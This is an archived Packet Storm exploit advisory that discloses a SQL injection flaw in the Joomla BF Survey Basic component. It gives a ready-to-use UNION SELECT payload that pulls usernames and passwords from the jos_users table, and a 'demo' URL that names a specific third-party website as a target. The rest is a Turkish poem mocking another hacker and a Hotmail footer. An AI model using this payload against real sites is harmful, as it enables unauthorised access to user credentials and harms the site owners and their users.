Joomla BF Survey Basic SQL Injection

2010-01-04T00:00:00
ID PACKETSTORM:84699
Type packetstorm
Reporter Fl0riX
Modified 2010-01-04T00:00:00

Description

                                        
                                            `  
[+] Joomla Component com_bfsurvey_basic SQL Injection Vulnerability  
  
[+] Author: FL0RiX  
  
[+] Greez : Wretch-x And All Friends  
  
[+] HomePage : http://oltan.org  
  
[+] Download : http://www.tamlyncreative.com.au/software/index.php/downloads.html?func=download&fileid=24  
  
############################################################################################################################  
  
[+] Exploit;  
  
[+] null/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password)fl0rix,user(),user()/**/from/**/jos_users--  
  
[+] Demo :   
  
[+] http://megasun.de/amie/index.php?option=com_bfsurvey_basic&view=bfsurveybasic&catid=38&Itemid=[EXPLOIT]  
  
############################################################################################################################  
< ---- Note ---- >  
F....N;  
Sen çok üstün zekaya sahip birisin,  
emin olabilirsin, :)  
Sql injection ile domain hackleyebilen tek lamersin, :)  
ASP'de Rfi Bulmakta Birebirsin,  
Ama Gördügüm En hIyar Lamersin :D  
Bu Kafiyelerde Bi TarafIna Girsin ;)  
Lol F....N :)  
< ---- Note Finished ---- >  
  
  
_________________________________________________________________  
Yeni Windows 7: Size en uygun bilgisayarý bulun. Daha fazla bilgi edinin.  
http://windows.microsoft.com/shop`